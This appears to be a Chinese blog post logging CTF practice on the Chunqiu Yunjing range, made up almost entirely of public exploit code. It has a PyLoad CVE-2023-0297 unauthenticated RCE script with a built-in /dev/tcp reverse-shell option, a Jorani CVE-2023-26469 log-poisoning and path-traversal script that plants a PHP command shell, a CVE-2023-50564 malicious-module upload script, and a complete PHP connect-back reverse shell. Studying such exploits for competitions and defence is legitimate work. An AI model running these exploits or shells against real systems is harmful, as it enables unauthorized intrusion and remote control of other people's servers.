春秋云镜刷题记录
C3ngH Lv4

现在越来越多的决赛使用 AWD 赛制了，在学长的点拨下还是要抓紧学一下渗透。

一些POC

CVE-2023-0297

# Exploit Title: PyLoad - Unauthenticated Remote Code Execution
# Date: 21-05-2023
# Exploit Author: Jacob Ebben
# Version: PyLoad < 0.5.0b3.dev31
# CVE: CVE-2023-0297

#!/usr/bin/env python3

import argparse
import requests
import urllib3
import string
import json
from termcolor import colored
from random import choice

# Silence the InsecureRequestWarning that requests/urllib3 emit for unverified
# HTTPS targets. This only filters the warning; it does not change verification.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def print_message(message, type):
    """Print *message* prefixed with a colour-coded ``[LEVEL]`` tag.

    ``type`` selects the tag text and colour: SUCCESS (green), INFO (blue),
    WARNING and ALERT (yellow), ERROR (red). Any other value prints nothing.
    """
    tag_colors = {
        'SUCCESS': 'green',
        'INFO': 'blue',
        'WARNING': 'yellow',
        'ALERT': 'yellow',
        'ERROR': 'red',
    }
    color = tag_colors.get(type)
    if color is None:
        return
    # The tag printed is the level name itself, coloured per the table above.
    print('[' + colored(type, color) + '] ' + message)


class POC:
    """Request builder for the CVE-2023-0297 proof of concept (PyLoad < 0.5.0b3.dev31).

    Holds the normalised target URL and the optional proxy mapping used by
    :meth:`execute_command`. Every call is blind: the response is discarded.
    """

    def __init__(self, target, proxy):
        # target is normalised to end in '/' and to carry a scheme, so endpoint
        # paths can be appended by plain concatenation in execute_command.
        self.base_url = self._get_normalized_url(target)
        self.proxies = self._get_proxies(self.base_url, proxy) if proxy else {}

        # NOTE: this session is created but never used; execute_command calls
        # requests.post directly, so no cookies are carried between requests.
        self.session = requests.Session()

    def execute_command(self, command):
        """POST *command* to the ``flash/addcrypted2`` endpoint of the target.

        The ``jk`` form field carries the injected code; the other three fields
        are random filler. Nothing is returned and the response is not inspected,
        so success cannot be observed from this method. *command* is
        interpolated unescaped inside a double-quoted string, so a command
        containing ``"`` breaks the payload. TLS verification is left at the
        requests default (no ``verify`` argument is passed).
        """
        url = self.base_url + "flash/addcrypted2"
        payload = f"pyimport os;os.system(\"{command}\");f=function f2(){{}};"

        # Filler fields only need to be present; their content is irrelevant.
        data = {
            "jk": payload,
            "packages": self._random_string(8),
            "crypted": self._random_string(8),
            "passwords": self._random_string(8),
        }

        # Response intentionally unused (blind request).
        response = requests.post(url, data=data, proxies=self.proxies)

    def _random_string(self, length=16):
        """Return *length* random ASCII letters (filler for form fields)."""
        return ''.join(choice(f"{string.ascii_letters}") for i in range(length))

    def _get_normalized_url(self, url):
        """Return *url* with a trailing '/' and an http(s) scheme (http:// if absent).

        Raises IndexError on an empty string (``url[-1]``).
        """
        if url[-1] != '/':
            url += '/'
        if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
            url = "http://" + url
        return url

    def _get_proxies(self, target_url, proxy_url):
        """Build the requests ``proxies`` mapping for the target's scheme only."""
        return {self._get_url_protocol(target_url): self._get_normalized_url(proxy_url)}

    def _get_url_protocol(self, url):
        """Return 'https' when *url* starts with https://, otherwise 'http'."""
        if url[0:8].lower() == 'https://':
            return 'https'
        return 'http'

def main():
    """Parse the command line and drive the PoC in one of three modes.

    Reverse shell (both ``-I`` and ``-P`` given), single command (``-c``), or
    an interactive loop reading commands from stdin. All modes are blind: the
    target's output is never shown, as the INFO messages below state.
    """
    parser = argparse.ArgumentParser(description="PyLoad - Unauthenticated Remote Code Execution")

    # NOTE: the trailing commas make these statements one-element tuples;
    # harmless, since add_argument's return value is not used.
    parser.add_argument('-t', '--target', required=True, type=str, help="url of the vulnerable site (Example: \"http://127.0.0.1:8000/\" or \"https://pyload.example.xyz/py/\")"),
    parser.add_argument('-c','--command', default=None, type=str, help='bash command to execute for single command mode (Default: Disabled)'),
    parser.add_argument('-I','--atk-ip', default=None, type=str, help='ip address for automatic reverse shell (Default: Disabled)'),
    parser.add_argument('-P','--atk-port', default=None, type=str, help='port for automatic reverse shell (Default: Disabled)'),
    parser.add_argument('-x','--proxy', default=None, type=str, help='http proxy address (Example: http://127.0.0.1:8080/)')

    args = parser.parse_args()

    exploit = POC(args.target, args.proxy)

    if args.atk_ip and args.atk_port:
        # Reverse-shell mode: the script does not listen itself; it only sends
        # the connect-back command once.
        print_message('Running reverse shell. Check your listener!', "SUCCESS")
        reverse_shell = f"/bin/bash -c 'exec /bin/bash -i &>/dev/tcp/{args.atk_ip}/{args.atk_port} <&1'"
        exploit.execute_command(reverse_shell)
    elif args.command:
        # Single-command mode.
        print_message(f'Running your command: "{args.command}"!', "SUCCESS")
        print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
        exploit.execute_command(args.command)
    else:
        # Interactive mode: loop until one of the quit words is typed.
        print_message('Please enter your command below!', "SUCCESS")
        print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
        while True:
            command = input(colored('>> ', 'green'))
            if command in {'q','exit','quit','exit()','quit()'}:
                exit()
            exploit.execute_command(command)

# Run main() only when executed as a script, not on import.
if __name__ == "__main__":
    main()

CVE-2023-26469

"""
vulnerability covered by CVE-2023-26469
"""
import readline
import requests
import datetime
import sys
import re
import base64
import random
import string

# Silence the unverified-HTTPS warning; the login GET below passes verify=False.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Coloured console helpers: [+] success (green), [x] error (red), [?] log (yellow).
# The optional second argument is the print() line terminator.
msg = lambda x,y="\n":print(f'\x1b[92m[+]\x1b[0m {x}', end=y)
err = lambda x,y="\n":print(f'\x1b[91m[x]\x1b[0m {x}', end=y)
log = lambda x,y="\n":print(f'\x1b[93m[?]\x1b[0m {x}', end=y)

# CSRF_PATTERN pulls the csrf_test_jorani hidden field out of the login page.
# CMD_PATTERN captures whatever sits between the two '---------' markers that
# the command wrapper in the shell loop echoes around the command output.
CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
CMD_PATTERN = re.compile('---------(.*?)---------', re.S)

# Application paths appended to the target base URL by u().
URLS = {
    'login' : '/session/login',
    'view' : '/pages/view/',
}

# A fresh random 12-letter header name per run. POISON_PAYLOAD reads commands
# from $_SERVER['HTTP_<HEADER_NAME>'], so this name is the distinctive artefact
# in any request logging that records headers.
alphabet = string.ascii_uppercase
HEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))

# Headers sent with every command request. The dict name suggests the
# X-REQUESTED-WITH value is what avoids a login redirect — not verified here.
# The HEADER_NAME entry is filled per command in the shell loop.
BypassRedirect = {
    'X-REQUESTED-WITH' : 'XMLHttpRequest',
    HEADER_NAME : ""
}

INPUT = "\x1b[92mjrjgjk\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ " # The input used for the pseudo term

# u(base, key) -> base + URLS[key]
u = lambda x,y: x + URLS[y]

# POISON_PAYLOAD is submitted as the 'login' form value so it lands in the
# application log; PATH_TRAV_PAYLOAD is submitted as the 'language' value
# (the script's own messages call it the path traversal).
POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
PATH_TRAV_PAYLOAD = "../../application/logs"

if __name__ == '__main__':
    print("""
/!\\ Do not use this if you are not authorized to /!\\
""")
    log("POC made by @jrjgjk (Guilhem RIOUX)", "\n\n")

    # Exactly one positional argument is expected: the target base URL.
    if(len(sys.argv) == 1):
        err(f"Usage: {sys.argv[0]} <url>")
        exit(0)

    log(f"Header used for exploit: {HEADER_NAME}")

    t = sys.argv[1]

    # One session so the cookie issued by the login page is reused for the
    # POST and for the later log-file requests. verify=False: certificate
    # errors on the target are ignored.
    s = requests.Session()
    log("Requesting session cookie")
    res = s.get(u(t,"login"), verify = False)

    C = s.cookies.get_dict()  # NOTE: captured but never used below

    # Log file name is derived from the local date; it will not match if the
    # target's clock or time zone differs from this machine's.
    Date = datetime.date.today()
    log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"

    # IndexError here if the login page carried no csrf_test_jorani field.
    csrf_token = re.findall(CSRF_PATTERN, res.text)[0]
    log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'")
    log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")
    msg(f"Recoveredd CSRF Token: {csrf_token}")

    data = {
        "csrf_test_jorani" : csrf_token,
        "last_page" : "session/login",
        "language" : PATH_TRAV_PAYLOAD,
        "login" : POISON_PAYLOAD,
        "CipheredValue" : "DummyPassword"
    }

    # The POST result is not checked; failure only shows up later when the
    # command output markers are missing.
    s.post(u(t,"login"), data=data)

    log(f"Accessing log file: {log_file_name}")

    exp_page = t + URLS['view'] + log_file_name

    ### Shell
    # Each command is base64-encoded into the random header and the page is
    # fetched; output is whatever lands between the '---------' markers.
    cmd = ""
    while True:
        cmd = input(INPUT)
        if(cmd in ['x', 'exit', 'quit']):
            break
        elif(cmd == ""):
            continue
        else:
            BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")
            res = s.get(exp_page, headers=BypassRedirect)
            cmdRes = re.findall(CMD_PATTERN, res.text)
            # Bare except: any failure (no markers found -> IndexError, or
            # anything else) dumps the raw page and terminates the loop.
            try:
                print(cmdRes[0])
            except:
                print(res.text)
                err("Wow, there was a problem, are you sure of the URL ??")
                err('exiting..')
                exit(0)

CVE-2023-50564

#Replace <hostname>
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

# Target endpoints; '<hostname>' is a placeholder to be filled in before use.
login_url = "http://<hostname>/login.php"
upload_url = "http://<hostname>/admin.php?action=installmodule"
headers = {"Referer": login_url,}
# NOTE(review): '<username>' appears as a dict *key* with an empty value while
# the password goes under "cont1" — looks like a transcription slip; confirm
# the actual form field names before relying on this request.
login_payload = {"cont1": "<password>","<username>": "","submit": "Log in"}

file_path = input("ZIP file path: ")

# The archive is sent as multipart/form-data under the 'sendfile' field.
# NOTE: the file handle opened here is never closed explicitly; it is only
# released when the interpreter exits.
multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("payload.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)

# Only the HTTP status is checked. A login page re-rendered with an error
# would also return 200, so "Login account" does not prove authentication.
if login_response.status_code == 200:
    print("Login account")

    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    # Same caveat: 200 does not confirm the module was actually installed.
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)

# NOTE: uses a different placeholder ('<url>') from the URLs above and is
# fetched with a plain requests.get, i.e. outside the authenticated session.
# This request runs even when the login or upload branch above reported failure.
rce_url="http://<url>/data/modules/payload/shell.php"

rce=requests.get(rce_url)

print(rce.text)

shell.php -> shell.zip

# Add <your_ip> and <port> (EoF)
<?php
// Copyright (c) 2020 Ivan Sincek
// v2.3
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
/**
 * Connect-back shell: opens a TCP connection to $addr:$port, starts a local
 * shell via proc_open() and relays bytes between the socket and the shell's
 * STDIN/STDOUT/STDERR pipes until either side closes.
 *
 * Everything relayed is also echoed (HTML-escaped) into the HTTP response by
 * dump(), and each failure path writes a fixed "*_ERROR:" / "DAEMONIZE:" line
 * to the response — those strings are a recognisable trace of this script in
 * captured responses or PHP output logs.
 */
class Shell {
    private $addr = null;
    private $port = null;
    private $os = null;      // 'LINUX' or 'WINDOWS', set by detect()
    private $shell = null;   // 'sh' or 'cmd.exe', set by detect()
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $buffer = 1024;  // read/write buffer size
    private $clen = 0;       // command length
    private $error = false;  // stream read/write error
    /** @param string $addr connect-back host  @param int $port connect-back port */
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }
    /** Pick os/shell from PHP_OS; returns false (and prints SYS_ERROR) if unsupported. */
    private function detect() {
        $detected = true;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os = 'LINUX';
            $this->shell = 'sh';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os = 'WINDOWS';
            $this->shell = 'cmd.exe';
        } else {
            $detected = false;
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
        }
        return $detected;
    }
    /**
     * Try to fork and detach (pcntl_fork + posix_setsid). Returns true only in
     * the parent after a successful fork, which makes run() skip the shell; all
     * other outcomes return false and the current process carries on.
     */
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else if (($pid = @pcntl_fork()) < 0) {
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
        } else if ($pid > 0) {
            $exit = true;
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
        } else if (posix_setsid() < 0) {
            // once daemonized you will actually no longer see the script's dump
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
        } else {
            echo "DAEMONIZE: Completed successfully!\n";
        }
        return $exit;
    }
    /** Silence errors, lift the execution time limit and clear the umask. */
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); // do not impose the script execution time limit
        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    /** Echo $data into the HTTP response with < and > escaped. */
    private function dump($data) {
        $data = str_replace('<', '&lt;', $data);
        $data = str_replace('>', '&gt;', $data);
        echo $data;
    }
    /** fread() wrapper; a false result sets $this->error, which ends the run() loop. */
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    /** fwrite() wrapper; a false result sets $this->error, which ends the run() loop. */
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true; // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    // Copies $input to $output in $buffer-sized chunks until a read returns
    // nothing (empty string or false) or a write fails.
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
            $this->dump($data); // script's dump
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $fstat = fstat($input);
        $size = $fstat['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
            // for some reason Windows OS pipes STDIN into STDOUT
            // we do not like that
            // we need to discard the data from the stream
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); // script's dump
        }
    }
    /**
     * Main loop: connect (30 s timeout), spawn the shell, then multiplex with
     * stream_select() until the socket or the shell process closes or a
     * read/write error is flagged. Pipes and the socket are closed on exit.
     */
    public function run() {
        if ($this->detect() && !$this->daemonize()) {
            $this->settings();

            // ----- SOCKET BEGIN -----
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) {
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
            } else {
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS

                // ----- SHELL BEGIN -----
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
                if (!$process) {
                    echo "PROC_ERROR: Cannot start the shell\n";
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                    }

                    // ----- WORK BEGIN -----
                    // First bytes on the wire are this banner with the shell PID.
                    $status = proc_get_status($process);
                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");
                    do {
                        $status = proc_get_status($process);
                        if (feof($socket)) { // check for end-of-file on SOCKET
                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                        } else if (feof($pipes[1]) || !$status['running']) { // check for end-of-file on STDOUT or if process is still running
                            echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
                        } // use proc_get_status() instead
                        $streams = array(
                            'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                            'write' => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
                        if ($num_changed_streams === false) {
                            echo "STRM_ERROR: stream_select() failed\n"; break;
                        } else if ($num_changed_streams > 0) {
                            if ($this->os === 'LINUX') {
                                if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            } else if ($this->os === 'WINDOWS') {
                                // order is important
                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            }
                        }
                    } while (!$this->error);
                    // ------ WORK END ------

                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                // ------ SHELL END ------

                fclose($socket);
            }
            // ------ SOCKET END ------

        }
    }
}
echo '<pre>';
// change the host address and/or port number as necessary
// '<your_ip>' and <port> are placeholders; as written this line is not valid
// PHP until <port> is replaced by an integer literal.
$sh = new Shell('<your_ip>', <port>);
$sh->run(); // blocks until the connection or the shell process ends
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>